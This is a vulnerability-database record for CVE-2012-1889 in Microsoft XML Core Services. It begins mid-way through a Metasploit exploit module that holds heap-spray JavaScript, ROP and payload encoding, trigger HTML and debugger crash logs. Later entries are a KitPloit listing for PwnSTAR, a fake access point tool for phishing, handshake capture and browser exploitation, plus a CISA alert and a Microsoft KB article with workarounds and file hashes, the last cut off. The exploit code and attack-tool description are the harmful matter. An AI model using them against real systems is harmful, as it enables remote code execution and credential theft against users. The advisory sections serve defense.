\"\";\r\n for (var i = 0; i < blocksize; i++)\r\n {\r\n theblock += Math.floor(Math.random()*90)+10;\r\n }\r\n return theblock;\r\n }\r\n\r\n function tounescape(block)\r\n {\r\n var blocklen = block.length;\r\n var unescapestr = \"\";\r\n for (var i = 0; i < blocklen-1; i=i+4)\r\n {\r\n unescapestr += \"%u\" + block.substring(i,i+4);\r\n }\r\n return unescapestr;\r\n }\r\n\r\n var heap_obj = new heapLib.ie(0x10000);\r\n\r\n var rop = unescape(\"#{js_rop}\");\r\n var code = unescape(\"#{js_code}\");\r\n var nops_90 = unescape(\"#{js_90_nops}\");\r\n\r\n while (nops_90.length < 0x80000) nops_90 += nops_90;\r\n\r\n var offset_length = #{t['RopChainOffset']};\r\n\r\n for (var i=0; i < 0x1000; i++) {\r\n var padding = unescape(tounescape(randomblock(0x1000)));\r\n while (padding.length < 0x1000) padding+= padding;\r\n var junk_offset = padding.substring(0, offset_length - code.length);\r\n var single_sprayblock = code + junk_offset + rop + nops_90.substring(0, 0x800 - code.length - junk_offset.length - rop.length);\r\n while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;\r\n sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);\r\n heap_obj.alloc(sprayblock);\r\n }\r\n\r\n JS\r\n\r\n return spray\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n agent = request.headers['User-Agent']\r\n my_target = get_target(agent)\r\n\r\n # Avoid the attack if the victim doesn't have the same setup we're targeting\r\n if my_target.nil?\r\n print_error(\"#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}\")\r\n send_not_found(cli)\r\n return\r\n end\r\n\r\n p = payload.encoded\r\n js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch))\r\n js_nops = Rex::Text.to_unescape(\"\\x0c\"*4, Rex::Arch.endian(my_target.arch))\r\n js_90_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))\r\n\r\n\r\n if not my_target['Rop'].nil?\r\n js_rop = Rex::Text.to_unescape(get_rop_chain(my_target), 
Rex::Arch.endian(my_target.arch))\r\n end\r\n\r\n if my_target['RandomHeap']\r\n js = get_random_spray(my_target, js_rop, js_code, js_90_nops)\r\n elsif not my_target['Rop'].nil?\r\n js = get_aligned_spray(my_target, js_rop, js_code, js_nops, js_90_nops)\r\n else\r\n js = get_easy_spray(my_target, js_code, js_nops)\r\n end\r\n\r\n js = heaplib(js, {:noobfu => true})\r\n\r\n if datastore['OBFUSCATE']\r\n js = ::Rex::Exploitation::JSObfu.new(js)\r\n js.obfuscate\r\n end\r\n\r\n object_id = rand_text_alpha(4)\r\n\r\n html = <<-EOS\r\n <html>\r\n <head>\r\n <script>\r\n #{js}\r\n </script>\r\n </head>\r\n <body>\r\n <object classid=\"clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4\" id=\"#{object_id}\"></object>\r\n <script>\r\n var obj = document.getElementById('#{object_id}').object;\r\n var src = unescape(\"%u0c08%u0c0c\");\r\n while (src.length < 0x1002) src += src;\r\n src = \"\\\\\\\\\\\\\\\\xxx\" + src;\r\n src = src.substr(0, 0x1000 - 10);\r\n var pic = document.createElement(\"img\");\r\n pic.src = src;\r\n pic.nameProp;\r\n obj.definition(#{rand(999) + 1});\r\n </script>\r\n </body>\r\n </html>\r\n EOS\r\n\r\n html = html.gsub(/^ {4}/, '')\r\n\r\n print_status(\"#{cli.peerhost}:#{cli.peerport} - Sending html\")\r\n send_response(cli, html, {'Content-Type'=>'text/html'})\r\n\r\n end\r\n\r\nend\r\n\r\n=begin\r\n(e34.358): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=7498670c ebx=00000000 ecx=5f5ec68b edx=00000001 esi=7498670c edi=0013e350\r\neip=749bd772 esp=0013e010 ebp=0013e14c iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmsxml3!_dispatchImpl::InvokeHelper+0xb4:\r\n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:5f5ec6a3=????????\r\n\r\n\r\n0:008> r\r\neax=020bf2f0 ebx=00000000 ecx=00000000 edx=00000001 esi=020bf2f0 edi=020bf528\r\neip=749bd772 esp=020bf1a8 ebp=020bf2e4 iopl=0 nv up ei 
pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nmsxml3!_dispatchImpl::InvokeHelper+0xb4:\r\n749bd772 ff5118 call dword ptr [ecx+18h] ds:0023:00000018=????????\r\n0:008> k\r\nChildEBP RetAddr \r\n020bf2e4 749bdb13 msxml3!_dispatchImpl::InvokeHelper+0xb4\r\n020bf320 749d4d84 msxml3!_dispatchImpl::Invoke+0x5e\r\n020bf360 749dcae4 msxml3!DOMNode::Invoke+0xaa\r\n020bf394 749bd5aa msxml3!DOMDocumentWrapper::Invoke+0x50\r\n020bf3f0 749d6e6c msxml3!_dispatchImpl::InvokeEx+0xfa\r\n020bf420 633a6d37 msxml3!_dispatchEx<IXMLDOMNode,&LIBID_MSXML2,&IID_IXMLDOMNode,0>::InvokeEx+0x2d\r\n020bf460 633a6c75 jscript!IDispatchExInvokeEx2+0xf8\r\n020bf49c 633a9cfe jscript!IDispatchExInvokeEx+0x6a\r\n020bf55c 633a9f3c jscript!InvokeDispatchEx+0x98\r\n020bf590 633a77ff jscript!VAR::InvokeByName+0x135\r\n020bf5dc 633a85c7 jscript!VAR::InvokeDispName+0x7a\r\n020bf60c 633a9c0b jscript!VAR::InvokeByDispID+0xce\r\n020bf7a8 633a5ab0 jscript!CScriptRuntime::Run+0x2989\r\n020bf890 633a59f7 jscript!ScrFncObj::CallWithFrameOnStack+0xff\r\n020bf8dc 633a5743 jscript!ScrFncObj::Call+0x8f\r\n020bf958 633891f1 jscript!CSession::Execute+0x175\r\n020bf9a4 63388f65 jscript!COleScript::ExecutePendingScripts+0x1c0\r\n020bfa08 63388d7f jscript!COleScript::ParseScriptTextCore+0x29a\r\n020bfa30 635bf025 jscript!COleScript::ParseScriptText+0x30\r\n020bfa88 635be7ca mshtml!CScriptCollection::ParseScriptText+0x219\r\n\r\n=end", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/19186/"}], "kitploit": [{"lastseen": "2020-04-07T04:44:23", "bulletinFamily": "tools", "cvelist": ["CVE-2012-1889"], "description": "[  ](<https://1.bp.blogspot.com/-l8LdwNFonuI/U7sF6jc2TdI/AAAAAAAACx0/isP84ZjzHWY/s1600/PwnSTAR.png>)\n\n \n\n\nA bash script to launch a Soft AP, configurable with a wide variety of attack options. Includes a number of index.html and server php scripts, for sniffing/phishing. 
Can act as multi-client captive portal using php and iptables. Launches classic exploits such as evil-PDF. De-auth with aireplay, airdrop-ng or MDK3. \n\n## Usage \n\n### Basic Menu \n \n \n 1) Honeypot: get the victim onto your AP, then use nmap, metasploit etc\n no internet access given\n \n 2) Grab WPA handshake\n \n 3) Sniffing: provide internet access, then be MITM\n \n 4) Simple web server with dnsspoof: redirect the victim to your webpage\n \n 5) Karmetasploit\n \n 6) Browser_autopwn\n \n\n1) Relies on auto-connections, i.e. the device connects without the owner being aware. You can then attempt to exploit it. Target the fake-AP ESSID to something the device has likely connected to previously, e.g. Starbucks WiFi \n\n2) Sometimes it is quicker to steal the handshake than sniff it passively. Set up the AP with the same name and channel as the target, and then DOS the target. Airbase will save a pcap containing the handshake to /root/PwnSTAR-n.cap. \n\n3) Provides an open network, so you can sniff the victim's activities. \n\n4) Uses apache to serve a webpage. There is an option to load your own page, e.g. one you have cloned. The provided page (hotspot_3) asks for email details. Note the client is forced to the page by DNS spoofing. They can only proceed to the internet if you manually stop dnsspoof. DNS-caching in the client is a problem with this technique. The captive portal in the advanced menu is a much better way of hosting hotspot_3 \n\n5&6) Provides all the config files to properly set-up Karmetasploit and Browser_autopwn. 
\n\n### Advanced Menu \n \n \n a) Captive portals (phish/sniff)\n \n b) Captive portal + PDF exploit (targets Adobe Reader < v9.3)\n \n c) MSXML 0day (CVE-2012-1889: MSXML Uninitialized Memory Corruption)\n \n d) Java_jre17_jmxbean\n \n e) Choose another browser exploit\n \n\na) Uses iptables rules to route the clients. This is a fully functioning captive portal, and can track and block/allow multiple connections simultaneously. Avoids the problems of dns-spoofing. There are two built-in web options: \n\n1) Serves hotspot3. Does not allow clients onto the internet until credentials have been given. \n\n2) Allows you to add a personal header to the index.php. You could probably copy the php functions from this page onto a cloned page, and load that instead. \n\nb) A captive portal which blocks the client until they have downloaded a pdf. This contains a malicious java applet. Includes a virgin pdf to which you can add your own payload. \n\nc&d) Launches a couple of example browser exploits \n\ne) Gives a skeleton framework for loading any browser exploit of your choice. Edit PwnSTAR browser_exploit_fn directly for more control. \n\n \n\n\n** [ Download PwnStar ](<https://github.com/SilverFoxx/PwnSTAR>) **\n", "edition": 18, "modified": "2014-07-07T20:48:19", "published": "2014-07-07T20:48:19", "id": "KITPLOIT:201756244894943835", "href": "http://www.kitploit.com/2014/07/pwnstar-script-for-multi-attack-for-all.html", "title": "PwnStar - Script for multi attack (for all your fake-AP needs!)", "type": "kitploit", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2020-12-18T18:08:12", "bulletinFamily": "info", "cvelist": ["CVE-2012-1889"], "description": "Microsoft has released Security Advisory [2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>) to address a vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0. 
This vulnerability may allow an attacker to execute arbitrary code if a user accesses specially crafted web pages using Internet Explorer. According to the advisory, this vulnerability is currently being exploited in the wild. \n \nUS-CERT encourages users and administrators to review Microsoft Security Advisory [2719615](<http://technet.microsoft.com/en-us/security/advisory/2719615>). The advisory indicates that the [workaround](<http://support.microsoft.com/kb/2719615>) does not correct the vulnerability, but it may help mitigate the risk against known attack vectors. \n \nUpdate: Additional information regarding CVE-2012-1889 can be found in the US-CERT Technical Alert TA12-174A. \n", "modified": "2012-10-23T00:00:00", "published": "2012-06-13T00:00:00", "id": "CISA:7267E59351C96006CADADD4154FFBCB1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2012/06/13/Microsoft-Releases-Security-Advisory-Microsoft-XML-Core-Services", "type": "cisa", "title": "Microsoft Releases Security Advisory for Microsoft XML Core Services ", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:35:08", "bulletinFamily": "microsoft", "cvelist": ["CVE-2012-1889"], "description": "<html><body><p>Resolves a security vulnerability in Microsoft XML Core Services that could allow arbitrary code to run when you view a specially crafted webpage by using Windows Internet Explorer.</p><h2></h2><div class=\"kb-notice-section section\"><br/><a bookmark-id=\"appliestoproducts\" href=\"#appliestoproducts\" managed-link=\"\" 
target=\"\">View products that this article applies to.</a></div><h2></h2><div class=\"kb-notice-section section\">Microsoft has rereleased security bulletin MS12-043. This security bulletin was previously released on July 10, 2012. This rereleased security bulletin includes Microsoft XML Core Services 5.0.</div><h2>Introduction</h2><div class=\"kb-summary-section section\">Microsoft has released security bulletin MS12-043. To view the complete security bulletin, go to one of the following Microsoft websites: <ul class=\"sbody-free_list\"><li>Home users:<br/><div class=\"indent\"><a href=\"http://www.microsoft.com/security/pc-security/bulletins/201208.aspx\" id=\"kb-link-1\" target=\"_self\">http://www.microsoft.com/security/pc-security/bulletins/201208.aspx</a></div><span class=\"text-base\">Skip the details</span>: Download the updates for your home computer or laptop from the Microsoft Update website now: <div class=\"indent\"><a href=\"http://update.microsoft.com/microsoftupdate\" id=\"kb-link-2\" target=\"_self\">http://update.microsoft.com/microsoftupdate</a></div></li><li>IT professionals:<br/><div class=\"indent\"><a href=\"http://technet.microsoft.com/security/bulletin/ms12-043\" id=\"kb-link-3\" target=\"_self\">http://technet.microsoft.com/security/bulletin/MS12-043</a></div></li></ul>To have us fix this problem for you, go to the \"<a bookmark-id=\"fixitforme\" href=\"#fixitforme\" managed-link=\"\" target=\"\">Fix it for me</a>\" section.<br/><a class=\"bookmark\" id=\"fixitforme\"></a></div><h2>Fix it for me</h2><div class=\"kb-resolution-section section\">The Fix it solution described in this section is not intended to be a replacement for any security update. We recommend that you always install the latest security updates. However, we offer this Fix it solution as a workaround option for some scenarios. 
<br/><br/>For more information about this workaround, go to the following Microsoft Security Advisory webpage: <div class=\"indent\"><a href=\"http://technet.microsoft.com/security/advisory/2719615\" id=\"kb-link-4\" target=\"_self\">http://technet.microsoft.com/security/advisory/2719615</a></div>The advisory provides more information about the issue. This information includes the following: <ul class=\"sbody-free_list\"><li>The scenarios in which you might apply or disable the workaround </li><li>How to manually apply the workaround </li></ul>Specifically, to see this information, expand the <strong class=\"uiterm\">Suggested actions</strong> section, and then expand the <strong class=\"uiterm\">Workaround</strong> section.<br/><br/><br/><span class=\"text-base\">Note</span> The following Fix it solutions do not apply to Windows 8 Consumer Preview or to Windows 8 Release Preview. <br/><h4 class=\"sbody-h4\">Fix it solution for MSXML version 3, MSXML version 4, and MSXML version 6</h4>To enable or disable these Fix it solutions, click the <strong class=\"uiterm\">Fix it</strong> button or link under the <strong class=\"uiterm\">Enable</strong> heading or under the <strong class=\"uiterm\">Disable</strong> heading, click <strong class=\"uiterm\">Run</strong> in the<strong class=\"uiterm\"> File Download</strong> dialog box, and then follow the steps in the Fix it wizard. 
<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Enable</th><th class=\"sbody-th\">Disable</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9811924\" text=\"Download\"></div></span></td><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9811925\" text=\"Download\"></div></span></td></tr></table></div><h4 class=\"sbody-h4\">Fix it solution for MSXML version 5</h4><br/>To enable or disable this fixit solution, click the <strong class=\"uiterm\">Fix it</strong> button or link under the <strong class=\"uiterm\">Enable</strong> heading or under the <strong class=\"uiterm\">Disable</strong> heading, click <strong class=\"uiterm\">Run</strong> in the <strong class=\"uiterm\"> File Download</strong> dialog box, and then follow the steps in the Fix it wizard. <br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">Enable</th><th class=\"sbody-th\">Disable</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9813081\" text=\"Download\"></div></span></td><td class=\"sbody-td\"><span><div caption=\"Microsoft Fix it\" fix-it=\"\" link=\"http://go.microsoft.com/?linkid=9813082\" text=\"Download\"></div></span></td></tr></table></div><span class=\"text-base\">Notes</span><ul class=\"sbody-free_list\"><li>These wizards may be in English only. However, the automatic fixes also work for other language versions of Windows. </li><li>If you are not on the computer that has the problem, you can save the automatic fix to a flash drive or to a CD and then run the fix on the computer that has the problem. 
</li><li>If you want to run a quiet installation of this Fix It solution, follow these steps:<br/><ol class=\"sbody-num_list\"><li>Open a command line by using administrator credentials. </li><li>Type the following command, and then press Enter:<div class=\"indent\"><span class=\"sbody-userinput\">msiexec /i MicrosoftFixit50897.msi /quiet</span></div></li></ol><br/></li></ul></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">Frequently asked questions (FAQs) about this security update</h3><span class=\"text-base\">Q: Why was this bulletin revised on October 9, 2012?<br/></span><span class=\"text-base\">A: </span>Microsoft revised this bulletin to offer the rerelease of security update 2687497 and 2687627 and for XML Core Services 5.0 when it is installed together with Office SharePoint Server 2007 or Groove Server 2007. This revision addresses an issue with specific digital certificates that were generated by Microsoft without the correct time stamp attributes. For more information, see\u00a0<a href=\"http://technet.microsoft.com/security/advisory/2749655\" id=\"kb-link-5\" target=\"_self\">Microsoft Security Advisory 2749655</a>. <h3 class=\"sbody-h3\">How to deploy an application compatibility database across multiple computers</h3>To deploy an application compatibility database across multiple computers, you can use a system management solution such as Microsoft System Center Configuration Manager 2007 and then use the SDBInst.exe command-line tool to install the database. 
For more information about how to use SDBInst.exe, go to the following Microsoft TechNet webpage: <div class=\"indent\"><a href=\"http://technet.microsoft.com/en-us/library/ee732408(v=ws.10).aspx\" id=\"kb-link-6\" target=\"_self\">Deploy an Application Compatibility Database by Using SDBInst</a></div>To deploy Microsoft Fix it 50897 to multiple computers by using SDBInst.exe, follow these steps.\u00a0<br/><br/><span class=\"text-base\">Note </span>For more information about command-line options for installing this fix, go to the following Microsoft Developer Network (MSDN) webpage: <div class=\"indent\"><a href=\"http://msdn.microsoft.com/en-us/library/aa372024(vs.85).aspx\" id=\"kb-link-7\" target=\"_self\">Standard Installer Command-Line Options</a></div><br/><ol class=\"sbody-num_list\"><li>Extract the CAB file from the Fix it package. To do this, type the following command at the command prompt: <div class=\"indent\"><span class=\"sbody-userinput\">msidb.exe -x CabFile -d MicrosoftFixit50897.msi</span></div><span class=\"text-base\">Note</span> Msidb.exe is part of Windows Installer Development Tools. For more information, go to the following Microsoft webpage: <div class=\"indent\"><a href=\"http://msdn.microsoft.com/en-us/library/windows/desktop/aa370083(v=vs.85).aspx\" id=\"kb-link-8\" target=\"_self\">http://msdn.microsoft.com/en-us/library/windows/desktop/aa370083(v=vs.85).aspx</a></div></li><li>Extract the SDB files from CabFile by using any cab extraction utility:<br/><div class=\"indent\"><span class=\"sbody-userinput\">extract.exe /E <strong class=\"sbody-strong\">CabFile</strong></span></div></li><li>Use <span class=\"text-base\">SDBInst</span> to apply the previously extracted .sdb files. 
To do this, type the following command at a command prompt: <div class=\"indent\"><span class=\"sbody-userinput\">SDBInst <strong class=\"sbody-strong\">Path_of_sdb_file</strong>\\<strong class=\"sbody-strong\">FileName</strong>.sdb</span></div><h4 class=\"sbody-h4\">File hash table</h4>The following table lists the thumbprints of the certificates that are used to sign the .sdb files. Verify the certificate thumbprint in this table against the certificate thumbprint that is indicated on the .sdb that you extracted. <br/><br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">Hash information </th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml3_shim32.sdb</td><td class=\"sbody-td\">(SHA1 FC673C013DE2D40D03FD2EFC94D0B9965BAA3253)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml3_shim64.sdb</td><td class=\"sbody-td\">(SHA1 45431F80CE38BBB14FCB107E87F5DD22CCE203A1)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml4_shim32.sdb</td><td class=\"sbody-td\">(SHA1 FE29173CAC4EFC68FF51E8EC04369044C4687AAF)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml5_shim32.sdb</td><td class=\"sbody-td\">(SHA1 33abdc0e4cfaa040cf0ff1a29bead2878fcd7673)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml5_shim64.sdb</td><td class=\"sbody-td\">(SHA1 c7c97f97f3895f69ba217908750ed61fa69390e9)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6_shim32.sdb</td><td class=\"sbody-td\">(SHA1 6E69B741CD4CEF05F5B9FFB47B748EE97264131C)</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6_shim64.sdb</td><td class=\"sbody-td\">(SHA1 273BDFCBDBFE3D24B7F5D3586AF54BD0A93A6E63)</td></tr></table></div></li></ol></div><h2></h2><div class=\"kb-summary-section section\"><h3 class=\"sbody-h3\">How to obtain help and support for this security update</h3>Help installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-9\" 
target=\"_self\">Support for Microsoft Update</a><br/><br/>Security solutions for IT professionals: <a href=\"http://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-10\" target=\"_self\">TechNet Security Troubleshooting and Support</a><br/><br/>Help protect your Windows-based computer from viruses and malware: <a href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-11\" target=\"_self\">Virus Solution and Security Center</a><br/><br/>Local support according to your country: <a href=\"https://support.microsoft.com/common/international.aspx\" id=\"kb-link-12\" target=\"_self\">International Support</a></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><h3 class=\"sbody-h3\">More information about this security update</h3><h4 class=\"sbody-h4\">Known issues and additional information about this security update</h4>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information. If this is the case, the known issue is listed under each article link. 
<ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/en-us/help/2721693\" id=\"kb-link-13\">2721693 </a> MS12-043: Description of the security update for XML Core Services 6.0: July 10, 2012</li><li><a href=\"http://bemis/2687497\" id=\"kb-link-14\" target=\"_self\">2687497</a> MS12-043: Description of the security update for XML Core Services 5.0 when it is installed together with Office SharePoint Server 2007 or Groove Server 2007: August 14, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2596856\" id=\"kb-link-15\">2596856 </a> MS12-043: Description of the security update for XML Core Services 5.0 when it is installed together with the 2007 Office system, Office Compatibility Pack, Office Word Viewer, Expression Web or Expression Web 2: August 14, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2687627\" id=\"kb-link-16\">2687627 </a> MS12-043: Description of the security update for XML Core Services 5.0 when it is installed together with Office 2003 Service Pack 3: August 14, 2012</li><li><a href=\"https://support.microsoft.com/en-us/help/2721691\" id=\"kb-link-17\">2721691 </a> MS12-043: Description of the security update for XML Core Services 4.0: July 10, 2012<br/><br/>The following are the known issues in security update 2721691. For more information about these known issues, see security update 2721691.<br/><ul class=\"sbody-free_list\"><li>When you install this security update on a computer that is running Windows Vista or Windows Server 2008, you may have to restart the computer two times to complete the installation. </li><li>Security update 2721691 does not support the complete removal of MSXML 4.0. 
</li></ul></li><li><a href=\"https://support.microsoft.com/en-us/help/2719985\" id=\"kb-link-18\">2719985 </a> MS12-043: Description of the security update for XML Core Services 3.0: July 10, 2012</li></ul><span></span><h4 class=\"sbody-h4\">File hash information</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">SHA1 hash</th><th class=\"sbody-th\">SHA256 hash</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml4-KB2721691-fra.exe</td><td
class=\"sbody-td\">93DBAB9A47AF97947A2D610360DDFE12304015A1</td><td class=\"sbody-td\">C21CF561449FAA8A43CE522BDE37D6CE3BB89702F09B87F0FC3DA34284339195</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml4-KB2721691-ita.exe</td><td class=\"sbody-td\">C3A8B8484569095A9E8F1A034E4D1F775AC05AD0</td><td class=\"sbody-td\">975E64062B787E0476CD5642AAADCF37DBC3CE7955FCAAF914ADE8E56B9D92D3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml4-KB2721691-jpn.exe</td><td class=\"sbody-td\">B7EDE8786E574F26F7041E2D698475EC136D88C0</td><td class=\"sbody-td\">DE4D52D43D5E1889914963BDAD25BF8C8E60B1D24ABF67745BF3E9655CF010CB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml4-KB2721691-kor.exe</td><td class=\"sbody-td\">87C84D8B4A3F1B49610035A9AF03081BF39624D7</td><td class=\"sbody-td\">0E9E58C86E2DA6D79D6D0BB5F310A9795F9405F3AAE0ECF77018FA5C01640338</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-chs-amd64.exe</td><td class=\"sbody-td\">614C729D99434885FB2A3A1A50BADFD15564C00B</td><td class=\"sbody-td\">C4C956277B0EDC78CD954B470651D167AC6B31EF0B60A86C40FCF53C11CD284E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-chs-ia64.exe</td><td class=\"sbody-td\">C366441A01095A28A8F2C8BA492EF6B338742C21</td><td class=\"sbody-td\">81667972BB9A158152C288628BFB056BA606984DB27BD57C74653CB168D92534</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-chs-x86.exe</td><td class=\"sbody-td\">00E8481FA862EBBBA0B7DDB4033229E27CD097CF</td><td class=\"sbody-td\">719FC720CCC0509A647B9BC7BC280329BC291AA914B243C5ADE5CD086B400C7A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-cht-amd64.exe</td><td class=\"sbody-td\">B0A9C871768EEEB76989C32FA1B7C2A6224346ED</td><td class=\"sbody-td\">D85A2C051DAFF1B406CCB43CD5B380E5150A9C96F112A0B44874BB40B515834A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-cht-ia64.exe</td><td 
class=\"sbody-td\">34C1124B42B25AD191068F0160755370A4A8022E</td><td class=\"sbody-td\">929D148EE7AB1202A64F51A784AE9B7E67BAD039BE4E299584029766A92365F1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-cht-x86.exe</td><td class=\"sbody-td\">2B5D59ABD9798DC23BEF23C7709D3BF6947B3FDE</td><td class=\"sbody-td\">605C233BF55BA490DBE6525FB6E6475A14157DD27FDC0CBEB01A2D4A499F3262</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-deu-amd64.exe</td><td class=\"sbody-td\">A9FBE1C4AF4803417407DC83BF88866623B4FA01</td><td class=\"sbody-td\">064AF0556B4038C5ECA868C8EB4477EBA579B841D2CEA6B6C9F713FEE13D9DA6</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-deu-ia64.exe</td><td class=\"sbody-td\">D3650C0D56D842F969FF15D2798B0D1C0492D136</td><td class=\"sbody-td\">DDA7B19C70773516F33C87AE041CF572E8779B2EBA890D5702379B721E24616D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-deu-x86.exe</td><td class=\"sbody-td\">39C2F6811306720B6C2D529A1B85186E8B1AE8D5</td><td class=\"sbody-td\">F14F75E767C2E95A695CE6D8FF5F068482CFECD82761E4C7E6659362E36E3EB3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-enu-amd64.exe</td><td class=\"sbody-td\">4A0FCAA726B95D2B51F17997687069CF0C8417C7</td><td class=\"sbody-td\">D3267CC5E2F8237502F49D2121A21C73CB76852D51FF37DD3CB9922A990C5707</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-enu-ia64.exe</td><td class=\"sbody-td\">088EE83A6A94017B12F4B83B745E148B848671ED</td><td class=\"sbody-td\">F61DDAFD01E6E9C2DC3618A1D26B9AF22B10562F1C784331A39B8400CE3C6E24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-enu-x86.exe</td><td class=\"sbody-td\">FE596FC5D690D042AADF1CF51355F5069B395E9C</td><td class=\"sbody-td\">F6682FD987AB118A55F5D492A8F08E1E595819100B0FDC61BF923E93BC6D7ECE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-esn-amd64.exe</td><td 
class=\"sbody-td\">DFA20C4D6469C57C65B4A7B571C72736E101A2BC</td><td class=\"sbody-td\">74BEDD03D38AFF134E974122F827455936659509BC9377D1B7551EE5BC4E535F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-esn-ia64.exe</td><td class=\"sbody-td\">5266944D059B957159A055BD475AA5B18FAB39CA</td><td class=\"sbody-td\">7230A0FD13DE9679A8AAE0D38CEF739C584D0E80175BDEFE70196F2A16B86A74</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-esn-x86.exe</td><td class=\"sbody-td\">F853DB38158CD6D8470400538516677D8FEB2FDA</td><td class=\"sbody-td\">5C56E47F51677A15D99728E84AEAB2AB705104018FF64D373BFFE8C1C9E7E19A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-fra-amd64.exe</td><td class=\"sbody-td\">E0B2B590245016B94433107547CB15955949850A</td><td class=\"sbody-td\">229C26FAEDD5B0C94B8720C66D47F92817C1D1B685170F5F03AF6CAEF8A1C68C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-fra-ia64.exe</td><td class=\"sbody-td\">190DABB98D98FB98A78FCD16836F527B956AD951</td><td class=\"sbody-td\">08AA688AEFF5DCD5491906253F0230F6CB886F4A3C0C5419742BF020D20AC7B8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-fra-x86.exe</td><td class=\"sbody-td\">88FF741FA3A36DDD8160969423E37EA580D5E613</td><td class=\"sbody-td\">40B65CAF14CC750C05CE0D608B116FA62A2382A889AA020B1EA8C58D247647F2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-ita-amd64.exe</td><td class=\"sbody-td\">A94DF3E3364835A87D6F5EE242ADE967E5BE2DEE</td><td class=\"sbody-td\">3F06DE24A020EC8889EB3AE347C7EDAF9CDE88EB9BA18724EA6FBC08D2082A9F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">msxml6-KB2721693-ita-ia64.exe</td><td class=\"sbody-td\">1F273E7A46DA23197EA1584282EDDB0F47FA9010</td><td 